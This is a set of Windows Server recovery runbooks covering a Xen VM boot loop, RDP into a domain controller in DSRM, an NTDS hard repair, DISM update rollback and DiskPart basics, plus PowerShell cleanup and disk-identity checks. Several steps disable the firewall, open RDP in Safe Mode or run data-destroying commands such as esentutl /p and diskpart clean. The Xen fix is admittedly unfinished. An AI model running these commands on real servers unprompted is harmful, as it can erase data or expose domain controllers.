Document Purpose: This guide documents the process for diagnosing and recovering a Windows Server 2019/2022 VM running on XCP-ng / Xen Orchestra that becomes stuck in a reboot loop or shows the blue screen:

    STOP CODE: INACCESSIBLE_BOOT_DEVICE

1. Symptoms

1.1 Silent Reboot Loop

- VM resets immediately after attempting to boot.
- No Windows logo appears, or it appears only briefly.
- No BSOD is displayed; the VM simply restarts.

1.2 Visible BSOD

The VM may show a blue screen with:

    INACCESSIBLE_BOOT_DEVICE

1.3 WinPE is Accessible

- Server can boot from the Windows ISO.
- Command Prompt from recovery environment works.
- OS drive and files are visible and readable.
- Filesystem checks (chkdsk, sfc) may already pass.

2. Likely Root Causes

Area | Description
Corrupted Xen PV Drivers | Network/interface drivers crash early in boot, causing instant resets.
Crash-Suppressing Drivers | xencrsh.sys and related drivers can reboot the VM before a BSOD is displayed.
Bootloader / EFI Misalignment EFI partition or BCD is pointing to the wrong Windows installation or wrong disk. VM Boot Mode Conflict VM is running in PVHVM while OS expects HVM (or vice-versa), causing storage initialization failure. Driver Mismatch After Updates Windows Update or guest tools update changes the boot driver stack; Xen PV drivers no longer match. 3. Boot into Windows Recovery (WinPE) Attach the Windows Server ISO to the VM. Boot the VM from the ISO. Select Repair your computer > Troubleshoot > Command Prompt . 4. Identify the Windows Volume In Command Prompt (WinPE): diskpart list vol Locate the main NTFS partition (often around 199 GB). This is usually the OS drive. If it has no letter, assign one: select vol assign letter=C exit (Replace with the correct volume number.) 5. Navigate to the Drivers Folder From Command Prompt: C: cd \Windows\System32\drivers If C: does not work, try D: or E: until cd \Windows\System32\drivers succeeds. 6. List All Xen Drivers dir xen*.* Typical output will include some of the following: xenvbd.sys xenbus.sys xendisk.sys xeniface.sys.disabled xennet.sys.disabled xenvif.sys.disabled xenfilt.sys.disabled xencons.sys.disabled xencrsh.sys xen.sys Exact names may vary slightly depending on guest tools version. 7. Ensure Boot-Critical Xen Drivers Are Enabled These three drivers are required for disk access during boot: xenvbd.sys – virtual block device (disk I/O) xenbus.sys – Xen device bus driver xendisk.sys – disk boot interface If any of them are present with a .disabled suffix, re-enable them: ren xenvbd.sys.disabled xenvbd.sys ren xenbus.sys.disabled xenbus.sys ren xendisk.sys.disabled xendisk.sys Verify each: dir xenvbd.sys dir xenbus.sys dir xendisk.sys They must appear without .disabled or .bad . 8. 
Disable Non-Essential Xen Drivers (Common Crash Sources) The following drivers frequently cause early boot crashes or silent reboots and can safely be disabled during recovery: Driver Purpose Action During Recovery xencrsh.sys Crash handler (can suppress BSOD and reboot instead) Disable xeniface.sys Interface driver Disable xennet.sys Xen network driver Disable xenvif.sys Virtual interface driver Disable xenfilt.sys Filter driver Disable xencons.sys Console / communication driver Disable xensvc.sys (if present) Xen service Disable xen.sys Legacy Xen stub driver Disable Disable the above by renaming them. Example: ren xencrsh.sys xencrsh.sys.disabled ren xeniface.sys xeniface.sys.disabled ren xennet.sys xennet.sys.disabled ren xenvif.sys xenvif.sys.disabled ren xenfilt.sys xenfilt.sys.disabled ren xencons.sys xencons.sys.disabled ren xen.sys xen.sys.disabled (If a file does not exist, Windows will report that the file cannot be found. This is safe; move on to the next line.) Verify which drivers are disabled: dir *.disabled dir *.bad 9. Repair the Bootloader (EFI & BCD) After cleaning up drivers, rebuild the EFI boot configuration. 9.1 Mount the EFI System Partition diskpart list vol Locate the small FAT32 volume (~100 MB). This is usually the EFI System Partition. select vol assign letter=S exit 9.2 Rebuild EFI Boot Files with BCDBOOT bcdboot C:\Windows /s S: /f UEFI Expected output: Boot files successfully created. 10. Force VM to Show BSOD (Optional but Useful) If the VM was previously rebooting without any BSOD, it can be useful to disable automatic recovery so the stop code is visible. bcdedit /store C:\boot\bcd /set {default} recoveryenabled No bcdedit /store C:\boot\bcd /set {default} bootstatuspolicy ignoreallfailures After this, a failing boot should display an actual Blue Screen with a STOP code instead of silently rebooting. 11. 
Adjusting VM Virtualization Mode (HVM vs PVHVM) Windows can also fail with INACCESSIBLE_BOOT_DEVICE if the VM’s virtualization mode conflicts with the installed drivers. 11.1 Using XCP-ng CLI to Force HVM Mode SSH into the XCP-ng host. List the VM: xe vm-list name-label=MSLS-DC01_COPY Copy the VM’s UUID . Force BIOS/HVM boot and clear PV bootloader: xe vm-param-set uuid= HVM-boot-policy="BIOS order" xe vm-param-set uuid= PV-bootloader="" This makes the VM boot like a standard hardware virtual machine using generic Microsoft disk drivers, bypassing some PV boot dependencies. 12. Reboot and Test Detach the Windows ISO from the VM. Reboot the VM normally. Observe behavior: If Windows boots successfully, proceed to reinstall XCP-ng Guest Tools. If a BSOD still appears, note the exact STOP code and driver name (if shown). 13. Reinstall XCP-ng Guest Tools (After Successful Boot) Open Xen Orchestra or XCP-ng Center. Select the VM and choose Install Guest Tools . Inside the guest OS, open the mounted tools ISO and run setup.exe . Follow the wizard to install or repair guest tools. Reboot the VM and confirm it boots cleanly with PV drivers loaded. 14. If INACCESSIBLE_BOOT_DEVICE Persists If the VM still stops with INACCESSIBLE_BOOT_DEVICE after driver cleanup, EFI rebuild, and HVM mode testing, additional steps may be required: Restore registry hives from C:\Windows\System32\config\RegBack . Perform an in-place OS repair/upgrade using the Windows setup (keep files and settings). Restore the VM from a known-good snapshot or backup. These steps are scenario-specific and should be documented once a final working solution for this particular VM is determined. 15. Document Status Status: In progress — VM still presenting INACCESSIBLE_BOOT_DEVICE during some tests. Completed: Filesystem checks, DISM/SFC, Xen driver isolation, crash handler disablement, EFI/BCD rebuild. 
Next actions: Finalize working combination of:

- Driver set (which Xen drivers remain enabled), and
- VM virtualization mode (HVM vs PVHVM)

Once stable, append the final resolution steps, root cause summary, and preventive recommendations for future Windows Server deployments on XCP-ng.

Enabling RDP in Directory Services Restore Mode (DSRM)

This procedure allows you to remote into a Domain Controller while it is booted into Directory Services Restore Mode (DSRM) using RDP. This is not officially supported by Microsoft and should be used only for recovery and troubleshooting.

⚠️ Important

- Use this only on isolated or lab systems, or during controlled recovery windows.
- RDP in DSRM temporarily changes Safe Mode behavior and weakens security.
- Always remove these changes once recovery activities are complete.

1. Prerequisites

- Server is a Domain Controller running Windows Server (2016+ recommended).
- You can log on locally (console or hypervisor console) as a local Administrator / DSRM Administrator.
- You know the DSRM password for the server.

DSRM Logon Format

When using RDP in DSRM, you must log on as:

    .\Administrator

(local account) using the DSRM password, not the domain password.

2. Boot the Domain Controller into DSRM

On the DC, run:

    bcdedit /set safeboot dsrepair

Reboot the server. The DC will start in Directory Services Restore Mode (Safe Mode). Log on using the DSRM Administrator credentials.

Tip: After you are done with recovery work, remember to remove SafeBoot:

    bcdedit /deletevalue safeboot

3. Enable the RDP Service in Safe Mode

By default, the Remote Desktop Services (TermService) service does not start in Safe Mode / DSRM. We add a SafeBoot registry entry to allow it.

- Open an elevated Command Prompt or PowerShell window.
- Run the following command to allow TermService in Safe Mode with Networking:

    REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\TermService" /VE /T REG_SZ /D "Service" /F

- Start the Remote Desktop service:

    net start TermService

Note: If you see an error that dependencies are not running, complete the networking steps below and then re-run net start TermService.

4. Enable Networking in DSRM

DSRM typically starts with minimal or no networking. To allow RDP, we must enable some core network services.

- Add the MSIServer entry under SafeBoot (helps some services start correctly):

    REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MSIServer" /VE /T REG_SZ /D "Service" /F

- Start key networking services (run what is applicable; some may already be running or may not exist on all builds):

    net start msiserver
    net start nlasvc
    net start dhcp
    net start dnscache

- Start Remote Desktop Services again (if needed):

    net start TermService

Verification

Confirm that RDP is listening on TCP 3389:

    netstat -ano | findstr 3389

If you see a LISTENING entry on port 3389, the RDP listener is active.

5. Allow RDP Through the Firewall

Group Policy is not processed normally in DSRM, so we explicitly open the RDP firewall rule set.

- Enable the built-in Remote Desktop firewall group:

    netsh advfirewall firewall set rule group="remote desktop" new enable=Yes

- (Optional) For lab or emergency use, you may temporarily disable the firewall entirely:

    netsh advfirewall set allprofiles state off

Security Warning: Do not leave the firewall disabled longer than necessary. Re-enable it or restore normal security once recovery is complete.

6. Connect via RDP in DSRM

- From an admin workstation, open Remote Desktop Connection (mstsc).
- Connect to the server using its IP address or hostname.
- When prompted for credentials, use:
  Username: .\Administrator
  Password: the DSRM password (set when the DC was promoted).

You should now have a full RDP session into the server while it is in Directory Services Restore Mode, allowing you to run tools like NTDSUTIL, copy recovery files, and perform other repair tasks more comfortably.

7. Cleanup After Recovery

Once you have finished your AD repair or recovery work and are ready to return the DC to normal operation, perform the following cleanup.

7.1 Remove Safe Mode / DSRM Boot

From an elevated command prompt:

    bcdedit /deletevalue safeboot

Reboot the server into normal mode.

7.2 Remove the SafeBoot TermService Override

Open an elevated command prompt. Delete the TermService SafeBoot entry:

    REG DELETE "HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\TermService" /F

7.3 Restore Normal Firewall Settings

If you disabled the firewall, re-enable it:

    netsh advfirewall set allprofiles state on

Validate that only the expected firewall rules are enabled for RDP and other services.

✅ Summary

By adding TermService and MSIServer to the SafeBoot configuration, starting a minimal set of networking services, and enabling the RDP firewall rules, you can securely RDP into a Domain Controller while it is in DSRM. Remember to remove these changes once recovery is complete to return the server to its standard, hardened state.

Directory Services Cannot Start After Restoring NTDS & SYSVOL on a Single DC

Fixing STOP Code 0xC00002E2

This guide explains how to recover from the Windows Server Blue Screen:

    STOP CODE: 0xC00002E2 STATUS_DS_INIT_FAILURE

This typically occurs when:

- ntds.dit was restored manually
- SYSVOL was restored manually
- BurFlags may have been set
- The server was freshly promoted as a new DC
- The NTDS database state does not match the system registry metadata

On a single domain controller, this issue is fully recoverable using an NTDS hard repair.
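A leftover check for the changes made by the RDP-in-DSRM procedure above (its sections 2 to 5), added here as an example and not part of the original procedure. The function names and the sample state are constructed; the MSIServer entry is reported for review because section 7.2 of that procedure deletes only the TermService entry.

```powershell
# Added example, not part of the original procedure. Function names are hypothetical.
# Registry entries the procedure adds under SafeBoot\Network (its sections 3 and 4).
$SafeBootKeys = @(
    'HKLM:\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\TermService'
    'HKLM:\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MSIServer'
)

function Get-DsrmRdpState {
    # Collects live state. Run elevated on the DC once it is back in normal mode.
    [pscustomobject]@{
        SafeBootKeysPresent = @($SafeBootKeys | Where-Object { Test-Path -LiteralPath $_ })
        BcdCurrentEntry     = (bcdedit /enum '{current}' | Out-String)
        FirewallProfilesOff = @(Get-NetFirewallProfile |
                                Where-Object { $_.Enabled -eq 'False' } |
                                ForEach-Object { $_.Name })
        RdpRulesEnabled     = @(Get-NetFirewallRule -DisplayGroup 'Remote Desktop' |
                                Where-Object { $_.Enabled -eq 'True' } |
                                ForEach-Object { $_.DisplayName })
    }
}

function Test-DsrmRdpCleanup {
    # Turns a state object into findings: 'Fix' has a cleanup command on the page,
    # 'Review' needs a human decision.
    param([Parameter(Mandatory)] $State)
    $findings = @()

    foreach ($key in $State.SafeBootKeysPresent) {
        $regPath = $key -replace '^HKLM:', 'HKLM'
        if ($key -like '*\TermService') {
            $severity = 'Fix'
            $action   = "REG DELETE `"$regPath`" /F"
        } else {
            $severity = 'Review'
            $action   = 'Added in section 4, not removed by section 7; delete if it was not there before'
        }
        $findings += [pscustomobject]@{ Severity = $severity; Item = $regPath; Action = $action }
    }

    # bcdedit lists a "safeboot" element only while the override is still set.
    if ($State.BcdCurrentEntry -match '(?im)^\s*safeboot\s+(\S+)') {
        $findings += [pscustomobject]@{
            Severity = 'Fix'
            Item     = "BCD safeboot = $($Matches[1])"
            Action   = 'bcdedit /deletevalue safeboot'
        }
    }

    foreach ($fwProfile in $State.FirewallProfilesOff) {
        $findings += [pscustomobject]@{
            Severity = 'Fix'
            Item     = "Firewall profile '$fwProfile' is off"
            Action   = 'netsh advfirewall set allprofiles state on'
        }
    }

    foreach ($rule in $State.RdpRulesEnabled) {
        $findings += [pscustomobject]@{
            Severity = 'Review'
            Item     = "RDP rule enabled: $rule"
            Action   = 'Confirm this rule is expected on this DC'
        }
    }

    $findings
}

# Constructed sample state: TermService was cleaned up, everything else was left behind.
$sampleState = [pscustomobject]@{
    SafeBootKeysPresent = @('HKLM:\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MSIServer')
    BcdCurrentEntry     = "identifier              {current}`r`nsafeboot                DsRepair`r`n"
    FirewallProfilesOff = @('Domain', 'Private')
    RdpRulesEnabled     = @('Remote Desktop - User Mode (TCP-In)')
}

Test-DsrmRdpCleanup -State $sampleState | Format-Table -AutoSize -Wrap

# On the recovered DC, replace the sample with live data:
#   Test-DsrmRdpCleanup -State (Get-DsrmRdpState) | Format-Table -AutoSize -Wrap
```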
⚠️ Requirements This procedure is safe ONLY when: You have a single Domain Controller (no other DCs in the domain) There is no AD replication to other servers If you have more than one DC, stop here — this procedure can cause USN rollback in multi-DC environments. 1. Boot into Directory Services Restore Mode (DSRM) Restart the domain controller. During system startup, press F8 (or use your hypervisor / cloud console “Send F8” function). Select: Directory Services Restore Mode Log in using the DSRM password (set when the DC was promoted). 2. Perform a Hard Repair of NTDS.dit Open Command Prompt (Administrator) while in DSRM and run: esentutl /p "C:\Windows\NTDS\ntds.dit" You will be prompted: Proceed with repair (Y/N)? Type: Y This performs a “hard repair” of the AD database. This is only safe because this is a single DC domain. 3. Run an Integrity Check Still in DSRM, run: esentutl /g "C:\Windows\NTDS\ntds.dit" Expected output should end with something similar to: Integrity check successful If errors appear, stop and record the output before proceeding. 4. (Optional but Recommended) Defragment the Database Defragmenting the database can reclaim space and further clean up after the repair: esentutl /d "C:\Windows\NTDS\ntds.dit" Wait for the operation to complete before continuing. 5. Clean Up NTDS Log Files Navigate to the NTDS folder: C:\Windows\NTDS Delete only the following file types: *.log *.jrs edb.chk Do NOT delete: ntds.dit temp.edb any other *.dit files any *.jfm files Removing the log and checkpoint files ensures AD does not try to reuse invalid transaction logs after the repair. 6. Reboot the Server Normally Restart the server in normal mode: shutdown /r /t 0 Expected outcome: The server boots normally (no more STOP 0xC00002E2) The Active Directory Domain Services service starts You can log in normally with a domain account 7. 
Verify SYSVOL and NETLOGON Shares After logging in, open Command Prompt and run: net share You should see entries for: SYSVOL NETLOGON If those shares exist, SYSVOL is being published correctly. 8. Re-Initialize SYSVOL (FRS) Authoritatively If you manually restored SYSVOL content, you should re-initialize FRS so that this DC treats its SYSVOL as authoritative. Set the BurFlags value: reg add "HKLM\SYSTEM\CurrentControlSet\Services\NtFrs\Parameters\Backup/Restore\Process at Startup" /v BurFlags /t REG_DWORD /d 0xD4 /f Then restart the File Replication Service: net stop ntfrs net start ntfrs FRS will now rebuild its replication state using the restored SYSVOL as the authoritative source. 9. Validate Domain Health Run a domain controller diagnostic: dcdiag /v Review the output for: Netlogon-related errors SYSVOL or FRS errors General AD DS health issues If there are issues you are unsure about, you can paste the relevant sections into ChatGPT for analysis. Final Result When all steps are complete, you should have: A domain controller that boots without STOP 0xC00002E2 A repaired and consistent ntds.dit database SYSVOL correctly restored and shared FRS synchronized to the restored SYSVOL (BurFlags D4) Active Directory fully operational in a single-DC environment You can now proceed with normal operations and, if desired, plan for adding additional domain controllers, proper backups, and disaster recovery procedures to avoid similar issues in the future. Fix Windows Server Boot Failure After Windows Update This guide walks through recovering a Windows Server system that fails to boot after a Windows Update. It uses Windows Recovery Environment (WinRE) and DISM to revert or remove problematic updates. Tested with Windows Server 2019. The process is nearly identical for Server 2016 / 2022. 
Prerequisites Windows Server installation ISO matching your OS version Physical console, iDRAC, iLO, or other remote KVM access Administrator credentials BitLocker recovery key (if BitLocker is enabled) Step 1 — Boot into Windows Recovery Environment Download the correct Windows Server ISO from Microsoft. Search: "Windows Server 2019 Evaluation ISO" Boot the server using: Bootable USB Virtual Media via iDRAC / iLO At the installer screen: Click Next Select Repair your computer Navigate to: Troubleshoot → Advanced Options → Command Prompt If Windows already entered automatic recovery after multiple failed boots, you may see this menu without external media. Step 2 — Unlock BitLocker (If Enabled) If the system drive is encrypted, unlock it first: manage-bde -status manage-bde -unlock D: -RecoveryPassword YOUR-KEY-HERE Replace drive letter and recovery key as needed. Step 3 — Identify the Windows Installation Drive In recovery mode, drive letters change. The OS drive is often NOT C:. diskpart list volume exit Note the volume containing the Windows folder. dir C: dir D: dir E: Example: Windows located on D:\ Step 4 — Check Disk Integrity (Recommended) Before touching updates, verify filesystem health: chkdsk D: /f Replace D: with your OS drive. Step 5 — Revert Pending Updates This cancels unfinished update operations. dism /image:D:\ /cleanup-image /revertpendingactions This may take several minutes. When complete: Close Command Prompt Click Continue → Boot to Windows If Windows boots successfully, stop here. Step 6 — Remove a Fully Installed Broken Update If Windows crashes after login or loops during boot, the update must be manually removed. List Installed Packages dism /image:D:\ /get-packages Recent updates appear near the bottom. Remove a Package dism /image:D:\ /remove-package /packagename:PACKAGE_NAME Tip: Highlight package → right-click to copy → right-click to paste. Remove updates one at a time and reboot between attempts. 
Step 7 — Repair Boot Configuration (If System Still Won’t Start) If the system fails before Windows loads, repair the bootloader: bootrec /fixmbr bootrec /fixboot bootrec /scanos bootrec /rebuildbcd If /fixboot returns Access Denied: bootsect /nt60 sys Step 8 — Run System File Check Offline Scan for corrupted Windows files: sfc /scannow /offbootdir=D:\ /offwindir=D:\Windows Step 9 — Final Reboot Exit Command Prompt Remove installation media Reboot normally Troubleshooting Notes If DISM fails: verify correct drive letter If drive is read-only: run diskpart → attributes disk clear readonly If BitLocker relocks: unlock again If updates reinstall automatically: pause Windows Update after recovery Summary Boot to recovery Unlock BitLocker Locate OS drive Check disk health Revert pending updates Remove broken packages Repair bootloader if needed Run SFC This procedure resolves most Windows Update boot failures without reinstalling the operating system. DiskPart Tutorial — Windows Disk & Volume Management DiskPart is a low-level command-line tool used to manage disks, partitions, and volumes. It is commonly used in recovery environments, server troubleshooting, and OS deployment. ⚠ Warning: DiskPart can permanently destroy data. Always confirm disk numbers before making changes. When to Use DiskPart Windows won’t boot Disk or volume not visible Partition repair or cleanup Formatting drives Preparing disks for OS install Checking RAID / NVMe detection Launching DiskPart diskpart You’ll see: DISKPART> Basic Navigation Commands List all disks list disk Shows all physical disks detected by the system. Select a disk select disk 0 Replace 0 with the correct disk number. View disk details detail disk Working with Volumes List volumes list volume Displays partitions and drive letters. Select a volume select volume 2 View volume details detail volume Assign or Change Drive Letter assign letter=D Useful when Windows Recovery doesn’t mount drives correctly. 
Rescan Storage Devices rescan Forces DiskPart to re-detect disks. Useful after loading drivers. Clear Read-Only Disk State attributes disk clear readonly Fixes disks stuck in read-only mode. Create New Partition (Dangerous) ⚠ Erases existing partition layout. clean create partition primary format fs=ntfs quick assign Only use when preparing a disk for fresh installation. Repair Scenario — Disk Visible but No Volume Run list disk Select disk Run detail disk Run rescan Check volumes again If volumes still missing, partition table may be corrupted. Stop and switch to recovery tools. Exit DiskPart exit Common Mistakes to Avoid Running clean on wrong disk Formatting system disk accidentally Assuming disk numbers are same as BIOS Ignoring read-only attributes Writing new partitions before recovery attempt Recovery Best Practice Always document disk numbers first Never modify disk until data is backed up Use read-only inspection before repair If unsure — stop and escalate Summary DiskPart is powerful and dangerous Use it for inspection first, repair second Always confirm disk identity Never rush destructive commands DiskPart is a surgical tool — treat it like one. Disk vs Volume — Understanding Windows Storage Before using DiskPart, it is critical to understand the difference between a disk and a volume. Most recovery mistakes happen because these concepts are confused. What Is a Disk? A disk is a physical or virtual storage device. It is the entire container of storage capacity. Examples of disks: Physical hard drive (HDD) Solid State Drive (SSD / NVMe) RAID virtual disk VM virtual disk (VMDK / VHDX) SAN storage LUN Windows labels disks numerically: Disk 0 Disk 1 Disk 2 A disk has no usable filesystem until it is partitioned. It is raw storage. What Is a Volume? A volume is a formatted section of a disk. It is the usable storage space that Windows can read and write. 
Volumes: Have a filesystem (NTFS, ReFS, FAT32) Can receive a drive letter Contain files and folders Host the Windows operating system Users interact with volumes, not disks. Disk Structure Example A single disk may contain multiple partitions and volumes: Disk Partition Volume Purpose Disk 0 EFI System (hidden) Bootloader Disk 0 Microsoft Reserved (hidden) System use Disk 0 Main NTFS C: Windows OS Disk 0 Data NTFS D: User files Disk = entire drive Volumes = usable sections inside the drive Why This Matters in Recovery Drive letters change in recovery mode Windows may not mount volumes automatically You must identify the OS volume manually DiskPart shows the real storage structure Viewing Disks with DiskPart diskpart list disk Shows all physical disks detected by the system. Viewing Volumes list volume Displays all mounted volumes and their drive letters. Key Concept Summary A disk is the entire storage device A volume is a formatted section of that disk One disk can contain multiple volumes Windows operates on volumes, not raw disks Recovery requires locating the correct volume Important Warning ⚠ Commands like clean erase entire disks. They do not erase just a volume — they destroy the disk’s partition table. Always confirm disk identity before destructive actions. Mental Model Disk = entire pizza Volumes = slices of pizza You can’t eat the whole disk at once. You eat slices (volumes).
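
The "confirm disk identity before destructive actions" rule from the DiskPart warnings above, as an added example that is not part of the original tutorial. Test-DiskIdentity and New-GuardedCleanScript are hypothetical names, and the inventory is a constructed sample shaped like Get-Disk output; the generated script lines are the ones the tutorial lists for preparing a fresh disk.

```powershell
# Added example, not from the original tutorial. Function names are hypothetical.
function Test-DiskIdentity {
    # Checks that the disk number still points at the device you meant.
    param(
        [Parameter(Mandatory)] [object[]] $Inventory,         # objects shaped like Get-Disk output
        [Parameter(Mandatory)] [int]      $Number,
        [Parameter(Mandatory)] [string]   $ExpectedSerial,
        [Parameter(Mandatory)] [uint64]   $ExpectedSizeBytes
    )
    $match = @($Inventory | Where-Object { $_.Number -eq $Number })
    if ($match.Count -ne 1) {
        return [pscustomobject]@{ Safe = $false; Reasons = @("disk $Number not found exactly once") }
    }

    $disk    = $match[0]
    $reasons = @()
    $serial  = "$($disk.SerialNumber)".Trim()    # serials are often space-padded

    if ($serial -ne $ExpectedSerial.Trim()) {
        $reasons += "serial is '$serial', expected '$($ExpectedSerial.Trim())'"
    }
    if ([uint64]($disk.Size) -ne $ExpectedSizeBytes) {
        $reasons += "size is $($disk.Size) bytes, expected $ExpectedSizeBytes"
    }
    if ($disk.IsBoot -or $disk.IsSystem) {
        $reasons += 'disk holds the boot or system volume'
    }
    if ($disk.IsReadOnly) {
        $reasons += 'disk is read-only; find out why before clearing the attribute'
    }

    [pscustomobject]@{ Safe = ($reasons.Count -eq 0); Reasons = $reasons }
}

function New-GuardedCleanScript {
    # Returns DiskPart script lines only when every identity check passes.
    param(
        [Parameter(Mandatory)] [object[]] $Inventory,
        [Parameter(Mandatory)] [int]      $Number,
        [Parameter(Mandatory)] [string]   $ExpectedSerial,
        [Parameter(Mandatory)] [uint64]   $ExpectedSizeBytes
    )
    $check = Test-DiskIdentity @PSBoundParameters
    if (-not $check.Safe) {
        throw ("Refusing to script 'clean' for disk {0}: {1}" -f $Number, ($check.Reasons -join '; '))
    }
    @(
        "select disk $Number"
        'detail disk'                  # leaves a record of the target in the DiskPart output
        'clean'
        'create partition primary'
        'format fs=ntfs quick'
        'assign'
    )
}

# Constructed sample inventory. On a live system use: $inventory = Get-Disk
$inventory = @(
    [pscustomobject]@{ Number = 0; FriendlyName = 'SAMPLE OS DISK';   SerialNumber = ' SAMPLE-0001'
                       Size = 214748364800;  IsBoot = $true;  IsSystem = $true;  IsReadOnly = $false }
    [pscustomobject]@{ Number = 1; FriendlyName = 'SAMPLE DATA DISK'; SerialNumber = ' SAMPLE-0002'
                       Size = 1000204886016; IsBoot = $false; IsSystem = $false; IsReadOnly = $false }
)

# Correct number, serial and size: script lines are returned for review.
$lines = New-GuardedCleanScript -Inventory $inventory -Number 1 `
             -ExpectedSerial 'SAMPLE-0002' -ExpectedSizeBytes 1000204886016
$lines

# Same serial and size, but the disk number is off by one: the request is refused.
try {
    New-GuardedCleanScript -Inventory $inventory -Number 0 `
        -ExpectedSerial 'SAMPLE-0002' -ExpectedSizeBytes 1000204886016
} catch {
    "Blocked: $($_.Exception.Message)"
}
```

After reviewing the returned lines, save them to a text file and pass it to `diskpart /s`.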